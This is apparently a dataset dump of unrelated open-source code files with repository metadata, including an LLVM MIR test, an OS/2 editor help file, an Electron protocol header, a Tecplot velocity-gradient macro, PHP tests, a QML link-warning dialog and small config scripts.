OF MERCHANTABILITY, FITNESS # FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # CONTRIBUTORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS WITH THE # SOFTWARE. # ============================================================================== # Copyrights and Licenses for Third Party Software Distributed with LLVM: # ============================================================================== # The LLVM software contains code written by third parties. Such software will # have its own individual LICENSE.TXT file in the directory in which it appears. # This file will describe the copyrights, license, and restrictions which apply # to that code. # The disclaimer of warranty in the University of Illinois Open Source License # applies to all code in the LLVM Distribution, and nothing in any of the # other licenses gives permission to use the names of the LLVM Team or the # University of Illinois to endorse or promote products derived from this # Software. # The following pieces of software have additional or alternate copyrights, # licenses, and/or restrictions: # Program Directory # ------- --------- # Google Test llvm/utils/unittest/googletest # OpenBSD regex llvm/lib/Support/{reg*, COPYRIGHT.regex} # pyyaml tests llvm/test/YAMLParser/{*.data, LICENSE.TXT} # ARM contributions llvm/lib/Target/ARM/LICENSE.TXT # md5 contributions llvm/lib/Support/MD5.cpp llvm/include/llvm/Support/MD5.h # Original Source : https://github.com/llvm-mirror/llvm/blob/b931375195077d79330792590733db7de9a8f1bd/test/CodeGen/MIR/NVPTX/expected-floating-point-literal.mir # RUN: not llc -march=nvptx -mcpu=sm_20 -run-pass none -o /dev/null %s 2>&1 | FileCheck %s --- | define float @test(float %k) { entry: %0 = fadd float %k, 3.250000e+00 ret float %0 } ... --- name: test registers: - { id: 0, class: float32regs } - { id: 1, class: float32regs } body: | bb.0.entry: %0 = LD_f32_avar 0, 4, 1, 2, 32, &test_param_0 ; CHECK: [[@LINE+1]]:33: expected a floating point literal %1 = FADD_rnf32ri %0, float 3 StoreRetvalF32 %1, 0 Return ...
Mirah
3
AlexFence/linguist
samples/YAML/expected-floating-point-literal.mir
[ "MIT" ]
CREATE TABLE "author"("id" serial NOT NULL, PRIMARY KEY ("id") )
SQL
2
gh-oss-contributor/graphql-engine-1
cli/integration_test/v3/migrations/default/2_add_table_test.up.sql
[ "Apache-2.0", "MIT" ]
.*==============================================================* .* * .* File.ipf - Information Tag Language file for the File menu * .* help panels. * .* Copyright 1999 Excelsior. All Rights Reserved. * .* Copyright 1996,97 xTech Ltd. * .* * .*- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - * .* * .* Helps for FILE menu and its items: * .* PANEL_FILE * .* PANEL_FILENEW * .* PANEL_FILELOAD * .* PANEL_FILERELOAD * .* PANEL_FILESAVE * .* PANEL_FILESAVEAS * .* PANEL_FILESAVEALL * .* PANEL_FILEPRINT * .* PANEL_FILEAUTOSAVE * .* PANEL_FILEMAXNEW * .* PANEL_FILEBAK * .* PANEL_FILEUSE1AUTOWIN * .* * .* Helps for appropriate dialogs: * .* * .* PANEL_FASTLOADDLG * .* PANEL_FILEDLG * .* PANEL_SAVEASDLG * .* PANEL_SAVECHDLG * .* * .*==============================================================* .*--------------------------------------------------------------*\ .* Main file menu * .* res = PANEL_FILE * .*--------------------------------------------------------------*/ :h1 res=2200 name=PANEL_FILE.File Menu :i1 id=File.File Menu :p.The :hp2.File:ehp2. menu contains commands that you use to create, open, and save source files. It also contains a list of files (up to 15) that were most recently opened or saved using the :hp2.Save As:ehp2. command. The following commands appear in the :hp2.File:ehp2. menu: :parml compact tsize=3 break=all. :pt.:hp2.New:ehp2. :pd.Opens new empty window :pt.:hp2.Load:ehp2. :pd.Loads a file into new or existing window :pt.:hp2.Reload:ehp2. :pd.Reloads current file from disk :pt.:hp2.Save:ehp2. :pd.Saves any changes made to the current file :pt.:hp2.Save As:ehp2. :pd.Saves the current file using a new name :pt.:hp2.Save All:ehp2. :pd.Saves all changed files :pt.:hp2.Print:ehp2. :pd.Prints the cureent file or selection :pt.:hp2.Autosave:ehp2. :pd.Toggles autosave mode on or off :pt.:hp2.Maximize new windows:ehp2. :pd.Toggles new windows maximizing on or off :pt.:hp2.Create backup files:ehp2. :pd.Toggles create .BAK files mode on or off :pt.:hp2.Use single 'Auto window':ehp2. :pd.Toggles creation of new autowindows :eparml. .*--------------------------------------------------------------*\ .* File menu New command help panel * .* res = PANEL_FILENEW * .*--------------------------------------------------------------*/ :h1 res=2205 name=PANEL_FILENEW.New :i2 refid=File.New :p.Use the :hp2.New:ehp2. command to create a new empty window. :p.The word "Noname:hp1.x:ehp1." will appear in its title bar, where :hp1.x:ehp1. is an automatically generated number. You'll have to specify a name for the new file when you save it. :p.Mouse shortcut: Toolbar :artwork runin name='..\res\filenew.bmp'. .*--------------------------------------------------------------*\ .* File menu Load command help panel * .* res = PANEL_FILELOAD * .*--------------------------------------------------------------*/ :h1 res=2210 name=PANEL_FILELOAD.Load :i2 refid=File.Load :p.Use the :hp2.Load:ehp2. command to open an existing file. :p.A dialog will appear, providing different methods of loading files. :p.Mouse shortcut: Toolbar :artwork runin name='..\res\fileopen.bmp'. :p.Default keyboard shortcut: :hp2.F3:ehp2. .*--------------------------------------------------------------*\ .* File menu Load command help panel * .* res = PANEL_FILERELOAD * .*--------------------------------------------------------------*/ :h1 res=2215 name=PANEL_FILERELOAD.Reload :i2 refid=File.Reload :p.Use the :hp2.Reload:ehp2. command to reload the file in the current window from disk, discarding all changes made to it since last save. You will be prompted to save your changes, if any. :p.Default keyboard shortcut: :hp2.Ctrl+F3:ehp2. .*--------------------------------------------------------------*\ .* File menu Save command help panel * .* res = PANEL_FILESAVE * .*--------------------------------------------------------------*/ :h1 res=2220 name=PANEL_FILESAVE.Save :i2 refid=File.Save :p.Use :hp2.Save:ehp2. to store the current file. After the file is saved, the text remains in the window so that you can continue editing it. :p.Mouse shortcut: Toolbar :artwork runin name='..\res\filesave.bmp'. :p.Default keyboard shortcut: :hp2.F2:ehp2. :nt.If you are editing a new (Noname:hp1.x:ehp1.) file, select the :hp2.Save:ehp2. or :hp2.Save as:ehp2. choices to display the :hp2.Save as:ehp2. dialog so that you can name the file you are editing. A file must have a name to be saved. .*--------------------------------------------------------------*\ .* File menu Save As command help panel * .* res = PANEL_FILESAVEAS * .*--------------------------------------------------------------*/ :h1 res=2225 name=PANEL_FILESAVEAS.Save As :i2 refid=File.Save As :p.Use the :hp2.Save As:ehp2. command to name and save a new file or to save a file under a different name, or to a different location. :p.A dialog box will appear, prompting you for a new filename. You can also select a different drive/directory. .*--------------------------------------------------------------*\ .* File menu Save All command help panel * .* res = PANEL_FILESAVEALL * .*--------------------------------------------------------------*/ :h1 res=2230 name=PANEL_FILESAVEALL.Save All :i2 refid=File.Save All :p.Use the :hp2.Save All:ehp2. command to save all changed files. :p.Default keyboard shortcut: :hp2.Ctrl+F2:ehp2. .*--------------------------------------------------------------*\ .* File menu Print command help panel * .* res = PANEL_FILEPRINT * .*--------------------------------------------------------------*/ :h1 res=2235 name=PANEL_FILEPRINT.Print :i2 refid=File.Print :p.Use the :hp2.Print:ehp2. command to print the current file or selection. .*--------------------------------------------------------------*\ .* File menu Autosave command help panel * .* res = PANEL_FILEAUTOSAVE * .*--------------------------------------------------------------*/ :h1 res=2240 name=PANEL_FILEAUTOSAVE.Autosave :i2 refid=File.Autosave :p.Use :hp2.Autosave:ehp2. to toggle the autosave mode on or off. In the autosave mode XDS automatically saves all changed files before exiting or starting an external tool, such as a compiler. When the mode is off, you will be prompted to save your changes. .*--------------------------------------------------------------*\ .* File menu Maximize new windows command help panel * .* res = PANEL_FILEMAXNEW * .*--------------------------------------------------------------*/ :h1 res=2245 name=PANEL_FILEMAXNEW.Maximize new windows :i2 refid=File.Maximize new windows :p.Use :hp2.Maximize new windows:ehp2. to toggle automatic maximization of newly opened windows on or off. .*--------------------------------------------------------------*\ .* File menu Maximize new windows command help panel * .* res = PANEL_FILEBAK * .*--------------------------------------------------------------*/ :h1 res=2250 name=PANEL_FILEBAK.Create backup files :i2 refid=File.Create backup files :p.Use :hp2.Create backup files:ehp2. to toggle automatic creation of backup files. .*--------------------------------------------------------------*\ .* File menu Use single 'Auto window' command help panel * .* res = PANEL_FILEUSE1AUTOWIN * .*--------------------------------------------------------------*/ :h1 res=2255 name=PANEL_FILEUSE1AUTOWIN.Use single 'Auto window' :i2 refid=File.Use single 'Auto window' :p.Use :hp2.Use single 'Auto window':ehp2. to toggle multiple/single autowindow modes. See :link reftype=hd refid=GROUPS.Window Groups:elink. for more information. .************************ D i a l o g b o x e s : *************************. .*--------------------------------------------------------------*\ .* Load file dialog box help panel * .* res = PANEL_FASTLOADDLG * .*--------------------------------------------------------------*/ :h1 res=2265 name=PANEL_FASTLOADDLG.Load file dialog box :i1.Load file dialog :p.To open a file: :ol compact. :li.Type the file name in the :hp2.File:ehp2. field or select it using the dropdown list. You may also select the :hp2.Browse:ehp2. pushbutton to display the standard file dialog. :li.Choose a window group from the :hp2.Window:ehp2. dropdown list. :li.Select the :hp2.Ok:ehp2. pushbutton. :eol. :p.The :hp2.Advanced:ehp2. pushbutton displays the Advanced File Load Diaog (PANEL_FILEDLG) .* !!! Ref :p.Detailed description of controls: :dl break=all tsize=3. :dt.:hp2.Path:ehp2. :dd.Displays the path that will be used if you specify a relative pathname. :dt.:hp2.File:ehp2. :dd.Type the name of the file you want to open in the :hp2.File:ehp2. field and select the :hp2.OK:ehp2. pushbutton. You may also type absolute or relative pathname. :dt.:hp2.Window:ehp2. :dd.Select a window group in which you want the file to be opened. :dt.:hp2.Browse:ehp2. :dd.Select the :hp2.Browse:ehp2. pushbutton to display the standard file dialog and use it to choose a file. The file name will be placed into the :hp2.File:ehp2. field. :dt.:hp2.Advanced:ehp2. :dd.Select the :hp2.Advanced:ehp2. pushbutton to display the :link reftype=hd refid=PANEL_FILEDLG.Advanced file dialog:elink. :dt.:hp2.Ok:ehp2. :dd.Select the :hp2.Ok:ehp2. pushbutton to open the file. :dt.:hp2.Cancel:ehp2. :dd.Select the :hp2.Cancel:ehp2. pushbutton if you decide not to load a file. :edl. .*--------------------------------------------------------------*\ .* Advanced file dilalog box help panel * .* res = PANEL_FILEDLG * .*--------------------------------------------------------------*/ :h1 res=2270 name=PANEL_FILEDLG.Advanced file dilalog box :i1.Advanced file dilalog box :p.This dialog box provides editor window and source file list management functions. :note.All changes you make in this dialog are committed when you select the :hp2.Ok:ehp2. pushbutton. Select the :hp2.Cancel:ehp2. pushbutton to abandon your actions. :note.It is not possible to control the automatically generated file list. .* !!! ref. :p.The dialog contains two panes. The left pane is used to display the list of window groups .* !!! ref. or the source files list. .* !!! ref. The right pane contains a Norton Commander-like view or a directory. :sl compact. :li.:link reftype=hd refid=PANEL_FILEDLG_NEW.To create a new file...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_OPEN.To open files in a certain window group...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_SAVEAS.To save a file under a new name...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_CLOSE.To close a file...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_MOVE.To move an opened file from one window group to another...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_FONT.To select a different font for the group/list pane...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_FULLNAMES.To toggle full filenames mode...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_LEFTMODE.To switch between group/list panes...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_ADD.To add files to list...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_REMOVE.To remove a file from list...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_SELECT.To select files...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_PATH.To change drive and/or directory...:elink. :li.:link reftype=hd refid=PANEL_FILEDLG_SORT.To toggle sort mode...:elink. :esl. :h2 name=PANEL_FILEDLG_NEW.Creating a new file :p.To create a new file in a certain group&colon. :ol compact. :li.Point to the group header or to any file already belonging to that group in the ??? pane. :li.Click mouse button 2. :li.Select :hp2.New file:ehp2. from the pop-up menu. :eol. :p.An empty file named "Noname:hp1.x:ehp1.", where :hp1.x:ehp1. is an automatically generated number, will be added to the group. You will have to specify a name for the new file when you save it. :h2 name=PANEL_FILEDLG_OPEN.Opening files :p.To open one or more files in a certain window group, :link reftype=hd refid=PANEL_FILEDLG_SELECT.select:elink. the file(s) in the file pane and do one of the following&colon. :ul compact. :li.Press :hp2.Alt+:ehp2.:hp3.group number:ehp3. :li.Drag the selected file(s) to the group pane and drop onto the desired group header or onto any file already belonging to that group. :eul. :h2 name=PANEL_FILEDLG_SAVEAS.Saving a file under a new name :p.To save an opened file under a new name, drag it from the group pane to the file pane. The :link reftype=hd refid=PANEL_SAVEASDLG.Save As:elink. dialog will be displayed. :h2 name=PANEL_FILEDLG_CLOSE.Closing a file :p.To close an opened file&colon. :ol compact. :li.Point to the file in the group pane. :li.Click mouse button 2. :li.Select :hp2.Close window:ehp2. from the pop-up menu. :eol. :h2 name=PANEL_FILEDLG_MOVE.Moving files between groups :p.To move an opened file from one window group to another, drag it and drop inside the desired group. :h2 name=PANEL_FILEDLG_FONT.Selecting font :p.To select font to be used in a pane, click mouse button 2 inside that pane and select :hp2:Font:ehp2: from the pop-up menu. The standard font dialog will be displayed. :h2 name=PANEL_FILEDLG_FULLNAMES.Toggling full filenames mode :p.To toggle display of full file names in the group pane, click mouse button 2 inside that pane and select :hp2:Show full filenames:ehp2: from the pop-up menu. :h2 name=PANEL_FILEDLG_LEFTMODE.Left pane mode :p.To display the list of opened files in the left pane, select the :hp2.Editors:ehp2. !!! pushbutton. To display the list of source files for the !!! ref current workplace in that pane, select the :hp2.Source files list:ehp2. !!! pushbutton. :h2 name=PANEL_FILEDLG_ADD.Adding files to list :p.To add one or more files from the file pane to the source file list&colon. :ul compact. :li.:link reftype=hd refid=PANEL_FILEDLG_SELECT.Select:elink. them in the file pane. :li.Drag the selected file(s) to the list pane. :eul. :p.To add a file by specifying its full name, click mouse button 2 anywhere inside the list and select :hp2:Add file:ehp2: from the pop-up menu. !!! correct menu, open std dialog :h2 name=PANEL_FILEDLG_REMOVE.Removing a file from list :p.To remove a file from the source file list&colon. :ol compact. :li.Point to the file in the list pane. :li.Click mouse button 2. :li.Select :hp2.Remove from list:ehp2. from the pop-up menu. :eol. :h2 name=PANEL_FILEDLG_SELECT.Selecting files in the file pane :p.One line in the files pane contains a cursor. The file under the cursor is considered selected unless there is a multiple selection (see below). :p.To move the cursor, press the :hp2.Up/Down:ehp2: or :hp2.Ctrl-PgUp/Ctrl-PgDn:ehp2: keys. :p.To position the cursor on a particular file, click that file with mouse button 1 or start typing the name of that file on the keyboard. :p.Multiple files can be selected using the standard mouse technique with Ctrl-clicks and Shift-clicks, or with the keyboard by pressing the :hp2.Ins:ehp2. key. :p.To quickly remove selection, click mouse button 2 anywhere inside the file pane and select :hp2:Unselect all:ehp2: from the pop-up menu. :h2 name=PANEL_FILEDLG_PATH.Changing drive and directory :p.To display files on another drive, select that drive from the :hp2.Path:ehp2. combobox. :p,To display another directory, do one of the following&colon. :ul compact. :li.if the name of that directory is displayed in the file pane, double-click it or :li.:link reftype=hd refid=PANEL_FILEDLG_SELECT.Select:elink. it and press :hp2.Enter:ehp2.. :li.type the full pathname of that directory in the :hp2.Path:ehp2. combobox and select the :hp2.Go:ehp2 pushbutton. :eul. You may also press :hp2.Ctrl-PgUp:ehp2. to display the parent directory. :h2 name=PANEL_FILEDLG_SORT.Choosing sort mode :p.To sort files in the file pane by name, press :hp2.Ctrl+F3:ehp2. or click mouse button 2 anywhere inside the file pane and select :hp2:Sort/By name:ehp2: from the pop-up menu. !!! correct menu :p.To sort files in the file pane by type, press :hp2.Ctrl+F4:ehp2. or click mouse button 2 anywhere inside the file pane and select :hp2:Sort/By type:ehp2: from the pop-up menu. !!! correct menu .*--------------------------------------------------------------*\ .* Save as dialog box help panel * .* res = PANEL_SAVEASDLG * .*--------------------------------------------------------------*/ :h1 res=2275 name=PANEL_SAVEDLG.Save as dialog box :i1.Save as dialog :p.To name and save a new file of to save the current file under a new name: :ol compact. :li.Type the name of the file you want to save in the entry field or select :hp2.Browse:ehp2. to choose it using the standard file dialog. :li.Select the :hp2.OK:ehp2. pushbutton. :eol. :p.Detailed description of controls: :dl break=all tsize=3. :dt.:hp2.Save file as:ehp2. :dd.Type a new pathname of the file you want to save and select the :hp2.OK:ehp2. pushbutton. :dt.:hp2.Browse:ehp2. :dd.Select the :hp2.Browse:ehp2. pushbutton to display the standard file dialog and use it to choose a name for the file. The name will be placed into the :hp2.Save file as:ehp2. field. :dt.:hp2.Reset path:ehp2. :dd.Select the :hp2.Reset path:ehp2. pushbutton to reset the directory part of the pathname to the workplace directory. .* !!! link :dt.:hp2.OK:ehp2. :dd.Select the :hp2.OK:ehp2. pushbutton to save the file under the pathname specified in the :hp2.Save file as:ehp2. field. :dt.:hp2.Cancel:ehp2. :dd.Select the :hp2.Cancel:ehp2. pushbutton if you decide not to save the file. :edl. .*--------------------------------------------------------------*\ .* Save changes dialog box help panel * .* res = PANEL_SAVECHDLG * .*--------------------------------------------------------------*/ :h1 res=2280 name=PANEL_SAVECHDLG.Save changes dialog box :i1.Save changes dialog :p.This dialog box is displayed if there is one or more files that were not saved after last modification and you are launching a tool .* !!! ref or terminating the Environment. :p.Select: :dl break=all tsize=3. :dt.:hp2.Save all:ehp2. :dd.to save all modified files and continue the requested operation. :dt.:hp2.Prompt for each changed text:ehp2. :dd.to have the Environment prompt you if you want to save each modified file and then continue the operation. :dt.:hp2.Don't save and continue:ehp2. :dd.to continue the operation without saving any files. :dt.:hp2.Cancel:ehp2. :dd.to cancel the operation without saving any files. :edl.
IGOR Pro
4
zanud/xds-2.60
ide/OS2/src/IDE/help/file.ipf
[ "Apache-2.0" ]
// Copyright (c) 2019 GitHub, Inc. // Use of this source code is governed by the MIT license that can be // found in the LICENSE file. #ifndef SHELL_BROWSER_API_ELECTRON_API_PROTOCOL_H_ #define SHELL_BROWSER_API_ELECTRON_API_PROTOCOL_H_ #include <string> #include <vector> #include "content/public/browser/content_browser_client.h" #include "gin/handle.h" #include "gin/wrappable.h" #include "shell/browser/net/electron_url_loader_factory.h" namespace electron { class ElectronBrowserContext; class ProtocolRegistry; namespace api { std::vector<std::string> GetStandardSchemes(); void AddServiceWorkerScheme(const std::string& scheme); void RegisterSchemesAsPrivileged(gin_helper::ErrorThrower thrower, v8::Local<v8::Value> val); // Possible errors. enum class ProtocolError { kOK, // no error kRegistered, kNotRegistered, kIntercepted, kNotIntercepted, }; // Protocol implementation based on network services. class Protocol : public gin::Wrappable<Protocol> { public: static gin::Handle<Protocol> Create(v8::Isolate* isolate, ElectronBrowserContext* browser_context); // gin::Wrappable static gin::WrapperInfo kWrapperInfo; gin::ObjectTemplateBuilder GetObjectTemplateBuilder( v8::Isolate* isolate) override; const char* GetTypeName() override; private: Protocol(v8::Isolate* isolate, ProtocolRegistry* protocol_registry); ~Protocol() override; // Callback types. using CompletionCallback = base::RepeatingCallback<void(v8::Local<v8::Value>)>; // JS APIs. ProtocolError RegisterProtocol(ProtocolType type, const std::string& scheme, const ProtocolHandler& handler); bool UnregisterProtocol(const std::string& scheme, gin::Arguments* args); bool IsProtocolRegistered(const std::string& scheme); ProtocolError InterceptProtocol(ProtocolType type, const std::string& scheme, const ProtocolHandler& handler); bool UninterceptProtocol(const std::string& scheme, gin::Arguments* args); bool IsProtocolIntercepted(const std::string& scheme); // Old async version of IsProtocolRegistered. v8::Local<v8::Promise> IsProtocolHandled(const std::string& scheme, gin::Arguments* args); // Helper for converting old registration APIs to new RegisterProtocol API. template <ProtocolType type> bool RegisterProtocolFor(const std::string& scheme, const ProtocolHandler& handler, gin::Arguments* args) { auto result = RegisterProtocol(type, scheme, handler); HandleOptionalCallback(args, result); return result == ProtocolError::kOK; } template <ProtocolType type> bool InterceptProtocolFor(const std::string& scheme, const ProtocolHandler& handler, gin::Arguments* args) { auto result = InterceptProtocol(type, scheme, handler); HandleOptionalCallback(args, result); return result == ProtocolError::kOK; } // Be compatible with old interface, which accepts optional callback. void HandleOptionalCallback(gin::Arguments* args, ProtocolError error); // Weak pointer; the lifetime of the ProtocolRegistry is guaranteed to be // longer than the lifetime of this JS interface. ProtocolRegistry* protocol_registry_; }; } // namespace api } // namespace electron #endif // SHELL_BROWSER_API_ELECTRON_API_PROTOCOL_H_
C
5
TarunavBA/electron
shell/browser/api/electron_api_protocol.h
[ "MIT" ]
<div class="form-group"> <span class="col-sm-12 text-muted small"> Specify a reference of the repository using the following syntax: branches with <code>refs/heads/branch_name</code> or tags with <code>refs/tags/tag_name</code>. If not specified, will use the default <code>HEAD</code> reference normally the <code>master</code> branch. </span> </div> <div class="form-group"> <label for="stack_repository_reference_name" class="col-sm-2 control-label text-left">Repository reference</label> <div class="col-sm-10"> <input type="text" class="form-control" ng-model="$ctrl.value" id="stack_repository_reference_name" placeholder="refs/heads/master" ng-change="$ctrl.onChange($ctrl.value)" data-cy="component-gitRefInput" /> </div> </div>
HTML
3
GizMan/portainer
app/portainer/components/forms/git-form/git-form-ref-field/git-form-ref-field.html
[ "Zlib" ]
#!MC 1410 #Let's calculate the tensor of velocity gradients (Analyze->Calculate Variable menu): $!EXTENDEDCOMMAND COMMANDPROCESSORID = 'CFDAnalyzer4' COMMAND = 'Calculate Function=\'VELOCITYGRADIENT\' Normalization=\'None\' ValueLocation=\'Nodal\' CalculateOnDemand=\'F\' UseMorePointsForFEGradientCalculations=\'F\'' #Set of equations to define the S2+O2 decomposition of the tensor of velocity gradients #Preliminary calculations $!ALTERDATA EQUATION = '{s11} = {dUdX}' $!ALTERDATA EQUATION = '{s12} = 0.5*({dUdY}+{dVdX})' $!ALTERDATA EQUATION = '{s13} = 0.5*({dUdZ}+{dWdX})' $!ALTERDATA EQUATION = '{s22} = {dVdY}' $!ALTERDATA EQUATION = '{s23} = 0.5*({dVdZ}+{dWdY})' $!ALTERDATA EQUATION = '{s33} = {dWdZ}' $!ALTERDATA EQUATION = '{Omga12} = 0.5*({dUdY}-{dVdX})' $!ALTERDATA EQUATION = '{Omga13} = 0.5*({dUdZ}-{dWdX})' $!ALTERDATA EQUATION = '{Omga23} = 0.5*({dVdZ}-{dWdY})' #S2+Ohm2 tensor $!ALTERDATA EQUATION = '{s2o2_11} = {s11}**2 + {s12}**2 + {s13}**2 - {Omga12}**2 - {Omga13}**2' $!ALTERDATA EQUATION = '{s2o2_12} = {s11}*{s12} + {s12}*{s22} + {s13}*{s23} - {Omga13}*{Omga23}' $!ALTERDATA EQUATION = '{s2o2_13} = {s11}*{s13} + {s12}*{s23} + {s13}*{s33} - {Omga12}*{Omga23}' $!ALTERDATA EQUATION = '{s2o2_22} = {s12}**2 + {s22}**2 + {s23}**2 - {Omga12}**2 - {Omga23}**2' $!ALTERDATA EQUATION = '{s2o2_23} = {s12}*{s13} + {s22}*{s23} + {s23}*{s33} - {Omga12}*{Omga13}' $!ALTERDATA EQUATION = '{s2o2_33} = {s13}**2 + {s23}**2 + {s33}**2 - {Omga13}**2 - {Omga23}**2' #Let's retrieve the S2+O2 variables to be use by the tensor eigenvalues calculation tool $!GETVARNUMBYNAME |numVars2o2_11| NAME = "s2o2_11" $!GETVARNUMBYNAME |numVars2o2_12| NAME = "s2o2_12" $!GETVARNUMBYNAME |numVars2o2_13| NAME = "s2o2_13" $!GETVARNUMBYNAME |numVars2o2_22| NAME = "s2o2_22" $!GETVARNUMBYNAME |numVars2o2_23| NAME = "s2o2_23" $!GETVARNUMBYNAME |numVars2o2_33| NAME = "s2o2_33" #Tensor eigensystem (eigen-vectors and -values calculation) $!EXTENDEDCOMMAND COMMANDPROCESSORID = 'Tensor Eigensystem' COMMAND = 'T11VarNum = |numVars2o2_11|, T12VarNum = |numVars2o2_12|, T13VarNum = |numVars2o2_13|, T22VarNum = |numVars2o2_22|, T23VarNum = |numVars2o2_23|, T33VarNum = |numVars2o2_33|, SortEgnV = TRUE, SaveEgnVect = TRUE '
MAXScript
4
Mehrdadj93/handyscripts
macro/Lambda_2Calculation.mcr
[ "MIT" ]
.class public stack_var11 .super java/lang/Object .field private arr [I .method public <init>()V .limit stack 5 aload_0 invokenonvirtual java/lang/Object/<init>()V aload_0 iconst_2 newarray int putfield stack_var11/arr [I return .end method .method public f()I .limit stack 8 .limit locals 5 aload_0 getfield stack_var11/arr [I iconst_0 iaload ;; put arr[0] on stack (currently 0) aload_0 getfield stack_var11/arr [I iconst_0 iconst_1 iastore ;; store 1 in arr[0], ;; value on stack should not be touched ireturn .end method
Jasmin
3
mauguignard/cbmc
jbmc/regression/jbmc/stack_var11/stack_var11.j
[ "BSD-4-Clause" ]
--TEST-- Test that the ReturnTypeWillChange attribute cannot target functions --FILE-- <?php #[ReturnTypeWillChange] function foo() {} ?> --EXPECTF-- Fatal error: Attribute "ReturnTypeWillChange" cannot target function (allowed targets: method) in %s on line %d
PHP
3
NathanFreeman/php-src
Zend/tests/type_declarations/variance/return_type_will_change_function_error.phpt
[ "PHP-3.01" ]
#ifndef ROMKATV_GITSTATUS_STAT_H_ #define ROMKATV_GITSTATUS_STAT_H_ #include <sys/stat.h> namespace gitstatus { inline const struct timespec& MTim(const struct stat& s) { #ifdef __APPLE__ return s.st_mtimespec; #else return s.st_mtim; #endif } inline bool StatEq(const struct stat& x, const struct stat& y) { return MTim(x).tv_sec == MTim(y).tv_sec && MTim(x).tv_nsec == MTim(y).tv_nsec && x.st_size == y.st_size && x.st_ino == y.st_ino && x.st_mode == y.st_mode; } } // namespace gitstatus #endif // ROMKATV_GITSTATUS_STAT_H_
C
4
ptavares/powerlevel10k
gitstatus/src/stat.h
[ "MIT" ]
--TEST-- MessageFormat accepts IntlCalendar args --EXTENSIONS-- intl --SKIPIF-- <?php if (version_compare(INTL_ICU_VERSION, '51.2') || version_compare(INTL_ICU_VERSION, '52.1') >= 0) die('skip for ICU >= 51.2 and < 52.1'); ?> --FILE-- <?php ini_set("intl.error_level", E_WARNING); //ini_set("intl.default_locale", "nl"); ini_set('date.timezone', 'Europe/Lisbon'); $cal = new IntlGregorianCalendar(2012,04,17,17,35,36); $msgf = new MessageFormatter('pt_PT', '{0,date,full} {0,time,h:m:s a V}'); echo $msgf->format(array($cal)), "\n"; //NOT FIXED: /*$msgf = new MessageFormatter('en_US', '{1, select, date {{0,date,full}} other {{0,time,h:m:s a V}}}'); echo "msgf2: ", $msgf->format(array($time, 'date')), " ", $msgf->format(array($time, 'time')), "\n"; */ ?> --EXPECT-- Quinta-feira, 17 de Maio de 2012 5:35:36 PM ptlis
PHP
4
NathanFreeman/php-src
ext/intl/tests/msgfmt_format_intlcalendar_variant2.phpt
[ "PHP-3.01" ]
import QtQuick 2.0 import QtQuick.Controls 1.0 import QtQuick.Layouts 1.0 import im.ricochet 1.0 import "utils.js" as Utils ApplicationWindow { id: dialog width: 400 height: layout.height + 32 minimumWidth: width maximumWidth: width minimumHeight: height maximumHeight: height flags: styleHelper.dialogWindowFlags modality: Qt.WindowModal title: mainWindow.title signal closed onVisibleChanged: if (!visible) closed() function close() { visible = false } property string link property QtObject contact ColumnLayout { id: layout focus: true spacing: 8 anchors { left: parent.left right: parent.right top: parent.top margins: 16 } Label { Layout.fillWidth: true text: qsTr("<b>Warning!</b> Opening links with your default browser will harm your security and anonymity.<br><br>You can <a href='.'>copy to the clipboard</a> instead.") wrapMode: Text.Wrap horizontalAlignment: Qt.AlignHCenter onLinkActivated: { LinkedText.copyToClipboard(dialog.link) dialog.close() } } Item { width: 1; height: 1 } Rectangle { height: 1 Layout.fillWidth: true color: Qt.darker(palette.window, 1.5) } CheckBox { id: alwaysOpenContact text: qsTr("Don't ask again for links from %1").arg(contact ? Utils.htmlEscaped(contact.nickname) : "???") checked: contact.settings.data.alwaysOpenBrowser || false } CheckBox { id: alwaysOpenAll text: qsTr("Don't ask again for any links (not recommended!)") checked: uiSettings.data.alwaysOpenBrowser || false } RowLayout { width: parent.width Button { text: qsTr("Open Browser") onClicked: { if (alwaysOpenContact.checked) contact.settings.write("alwaysOpenBrowser", true) if (alwaysOpenAll.checked) uiSettings.write("alwaysOpenBrowser", true) Qt.openUrlExternally(link) dialog.close() } } Item { Layout.fillWidth: true; height: 1 } Button { text: qsTr("Cancel") isDefault: true onClicked: dialog.close() } } Keys.onEscapePressed: dialog.close() Keys.onReturnPressed: dialog.close() } }
QML
4
garrettr/ricochet
src/ui/qml/OpenBrowserDialog.qml
[ "OpenSSL" ]
server { server_name migration.com; server_name summer.com; } server { listen 443 ssl; server_name migration.com; server_name geese.com; ssl_certificate cert.pem; ssl_certificate_key cert.key; ssl_session_cache shared:SSL:1m; ssl_session_timeout 5m; ssl_ciphers HIGH:!aNULL:!MD5; ssl_prefer_server_ciphers on; }
DIGITAL Command Language
3
tsrivishnu/certbot
certbot-nginx/certbot_nginx/tests/testdata/etc_nginx/sites-enabled/migration.com
[ "Apache-2.0" ]
set -g OMF_MISSING_ARG 1 set -g OMF_UNKNOWN_OPT 2 set -g OMF_INVALID_ARG 3 set -g OMF_UNKNOWN_ERR 4 function omf::em set_color cyan 2> /dev/null end function omf::dim set_color 555 2> /dev/null end function omf::err set_color red --bold 2> /dev/null end function omf::under set_color --underline 2> /dev/null end function omf::off set_color normal 2> /dev/null end autoload $path/functions/{compat,core,index,packages,themes,bundle,util,repo,cli,search}
fish
3
codetriage-readme-bot/oh-my-fish
pkg/omf/init.fish
[ "MIT" ]
sleep 4 t drv led start front red 300 300 t drv led start front blue 300 300 t drv led start back red 300 300 blueled_back_a9_ctrl enable
AGS Script
1
waltersgrey/autoexechack
HERO4/LEDhack/autoexec.ash
[ "MIT" ]
